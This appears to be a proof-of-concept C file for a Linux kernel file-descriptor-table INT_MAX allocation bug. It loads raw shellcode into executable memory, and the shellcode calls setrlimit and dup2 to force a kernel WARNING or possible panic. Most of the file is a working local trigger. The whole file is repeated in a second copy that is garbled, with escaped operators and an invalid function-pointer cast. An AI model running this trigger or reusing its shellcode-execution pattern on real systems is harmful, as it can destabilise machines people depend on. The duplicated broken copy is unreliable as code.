emdnaia/fdtable_intmax_poc.c

## fdtable_intmax_poc.c
/*

## File Descriptor INT_MAX Overflow
----
- Info:

Tweet: https://x.com/spendergrsec/status/1958264076162998771

Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370

----
**Bug:** systemd sets `fs.nr_open` to ~1GB (1073741816). When a process calls `dup2()` with high FD numbers near this limit, the kernel attempts to allocate >8GB for the file descriptor table, exceeding INT_MAX (2,147,483,647 bytes).

**Impact:** Triggers kernel WARNING in mm/slub.c. Allocation always fails but causes noise/panic in logs.

**Root Cause:** Missing bounds check in `alloc_fdtable()` - didn't validate allocation size against INT_MAX before attempting kvmalloc.

**Incoming Fix:** Added check: `if (nr > INT_MAX / sizeof(struct file *)) return -EMFILE;`


- Compile like:

gcc shellcode.c -o shellcode_exec
./shellcode_exec

*/


#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = {
    0x40, 0xb7, 0x40, 0xc1, 0xe7, 0x18, 0x83, 0xef,
    0x08, 0x57, 0x57, 0x31, 0xff, 0x40, 0xb7, 0x07,
    0x31, 0xc0, 0xb0, 0xa0, 0x48, 0x89, 0xe6, 0x0f,
    0x05, 0x5e, 0xff, 0xce, 0x31, 0xff, 0xb0, 0x21,
    0x0f, 0x05,
    0x31, 0xc0, 0xb0, 0x3c, 0x31, 0xff, 0x0f, 0x05
};

int main() {
    printf("Shellcode size: %zu bytes\n", sizeof(shellcode));

    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(shellcode),
                          PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (exec_mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    // Copy shellcode to executable memory
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    printf("Executing shellcode...\n");

    // Execute it
    void (*func)() = (void (*)())exec_mem;
    func();

    printf("Done\n");  // Won't reach here
    return 0;
}
	/*

	## File Descriptor INT_MAX Overflow
	----
	- Info:

	Tweet: https://x.com/spendergrsec/status/1958264076162998771

	Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370

	----
	Bug: systemd sets `fs.nr_open` to ~1GB (1073741816). When a process calls `dup2()` with high FD numbers near this limit, the kernel attempts to allocate >8GB for the file descriptor table, exceeding INT_MAX (2,147,483,647 bytes).

	Impact: Triggers kernel WARNING in mm/slub.c. Allocation always fails but causes noise/panic in logs.

	Root Cause: Missing bounds check in `alloc_fdtable()` - didn't validate allocation size against INT_MAX before attempting kvmalloc.

	Incoming Fix: Added check: `if (nr > INT_MAX / sizeof(struct file *)) return -EMFILE;`


	- Compile like:

	gcc shellcode.c -o shellcode_exec
	./shellcode_exec

	*/


	#include <stdio.h>
	#include <string.h>
	#include <sys/mman.h>

	unsigned char shellcode[] = {
	0x40, 0xb7, 0x40, 0xc1, 0xe7, 0x18, 0x83, 0xef,
	0x08, 0x57, 0x57, 0x31, 0xff, 0x40, 0xb7, 0x07,
	0x31, 0xc0, 0xb0, 0xa0, 0x48, 0x89, 0xe6, 0x0f,
	0x05, 0x5e, 0xff, 0xce, 0x31, 0xff, 0xb0, 0x21,
	0x0f, 0x05,
	0x31, 0xc0, 0xb0, 0x3c, 0x31, 0xff, 0x0f, 0x05
	};

	int main() {
	printf("Shellcode size: %zu bytes\n", sizeof(shellcode));

	// Allocate executable memory
	void *exec_mem = mmap(NULL, sizeof(shellcode),
	PROT_READ \| PROT_WRITE \| PROT_EXEC,
	MAP_PRIVATE \| MAP_ANONYMOUS, -1, 0);

	if (exec_mem == MAP_FAILED) {
	perror("mmap");
	return 1;
	}

	// Copy shellcode to executable memory
	memcpy(exec_mem, shellcode, sizeof(shellcode));

	printf("Executing shellcode...\n");

	// Execute it
	void (func)() = (void ()())exec_mem;
	func();

	printf("Done\n"); // Won't reach here
	return 0;
	}
No results found